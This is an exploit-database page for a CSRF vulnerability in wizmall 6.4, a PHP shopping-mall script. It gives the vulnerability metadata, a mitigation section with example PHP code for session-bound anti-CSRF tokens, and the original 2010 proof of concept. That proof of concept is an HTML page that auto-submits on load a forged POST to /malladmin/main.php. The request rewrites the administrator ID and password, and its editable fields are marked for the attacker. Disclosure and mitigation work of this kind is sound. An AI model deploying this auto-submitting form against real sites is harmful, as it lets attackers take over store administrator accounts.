wizmall 6.4 CSRF Vulnerabilities - exploit.company
Vendor: wizmall
By: pyw1414
CVSS: 5.5 (MEDIUM)
CWE: 352 (CSRF)
Product Name: wizmall
Affected Version From: 6.4 UTF-8 For php
Affected Version To: 6.4 UTF-8 For php
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
2010

wizmall 6.4 CSRF Vulnerabilities

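CSRF exploit for wizmall 6.4 UTF-8 For php that allows changing the admin ID and password. The proof of concept below is a page that auto-submits a forged POST to /malladmin/main.php with action=admin_save; the request carries no anti-CSRF token, so it succeeds when sent from the browser of an administrator who is logged in.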

Mitigation:

Implement CSRF protection mechanisms, such as using unique tokens for each request.
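
One way to apply this mitigation to the admin_save request shown in the proof of concept, as an added example that is not wizmall code or part of the original advisory. The function names and the csrf_token field are hypothetical; the token is bound to the admin session and rotated after each accepted request.

```php
<?php
// Added example: anti-CSRF token guard for a state-changing admin POST.
// All function names and the 'csrf_token' field are hypothetical, not wizmall's.
declare(strict_types=1);

function csrf_start_session(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        // SameSite=Strict keeps the session cookie off cross-site POSTs (PHP >= 7.3).
        session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
        session_start();
    }
}

function csrf_token(): string
{
    // 256 bits from the CSPRNG, created lazily and stored server-side.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string
{
    // Emit this inside every admin form that changes state.
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

function csrf_is_valid(array $post, array $session): bool
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    // Reject missing, empty or non-string values; compare in constant time.
    return is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent);
}

// Guard placed before the handler acts on action=admin_save.
csrf_start_session();
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && ($_POST['action'] ?? '') === 'admin_save') {
    if (!csrf_is_valid($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    unset($_SESSION['csrf_token']); // rotate: the next form render gets a fresh token
    // ... existing admin_save logic runs only past this point ...
}
```

A forged cross-site form cannot read the session-bound token, so the auto-submitted POST is rejected with 403 before any admin field is written.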

Exploit-DB raw data:

# Exploit Title: wizmall 6.4 CSRF Vulnerabilities 
# Date: 08/10/2010
# Author: pyw1414 <i2SEC>
# Software Link: http://www.shop-wiz.com/board/main/view/root/wizmall01/159/0
# Version: 6.4 UTF-8 For php
# Tested on: XP SP3



-=[ CSRF Exploit - Change Admin ID/PW  ]=-

<html>
<head>
<title>Wizmall 6.4 UTF-8 For php CSRF Vulnerabilities - Change Admin Id/Password</title>
</head>

<body onload="document.csrf.submit();">
<form name="csrf" action="http://[domain]/malladmin/main.php" method="POST">
<!--- Edit these --->
<input type="hidden" name="ID" value="i2sec" />  
<input type="hidden" name="PASS" value="test1234" />  
<input type="hidden" name="PASS1" value="test1234" /> 

<!--- Do not edit below ---> 
<input type="hidden" name="menushow" value="menu1" />  
<input type="hidden" name="theme" value="basicconfig/basic_info2" />  
<input type="hidden" name="action" value="admin_save" />  
<input type="hidden" name="ADMIN_NAME" value="pyw1414" />
<input type="hidden" name="ADMIN_TITLE" value="i2Sec+Plaza" />  
<input type="hidden" name="ADMIN_TITLE_E" value="" />  
<input type="hidden" name="COMPANY_DOMAIN" value="" />
<input type="hidden" name="str_watermark" value="" />  
<input type="hidden" name="img_watermark" value="" />  
<input type="hidden" name="HOME_URL" value="" />  
<input type="hidden" name="ADMIN_EMAIL" value="ii@i2sec.co.kr" />  
<input type="hidden" name="ADMIN_TEL" value="" />
<input type="hidden" name="COMPANY_NAME" value="i2Sec" />  
<input type="hidden" name="PRESIDENT" value="" />  
<input type="hidden" name="COMPANY_NUM" value="" />  
<input type="hidden" name="COMPLICENCE_NUM" value="" />  
<input type="hidden" name="CUSTOMER_TEL" value="" />
<input type="hidden" name="CUSTOMER_FAX" value="" />  
<input type="hidden" name="COMPANY_ADD" value="" />  
<input type="hidden" name="COMPLICENCE_NUM" value="" />  
<input type="hidden" name="MART_BASEDIR" value="" />
<input type="hidden" name="SYSTEM_BASEDIR" value="" />  
<input type="hidden" name="smsModule" value="ANYSMS" />  
<input type="hidden" name="sms_id" value="" />  
<input type="hidden" name="sms_pwd" value="" />

</form>
</body>
</html>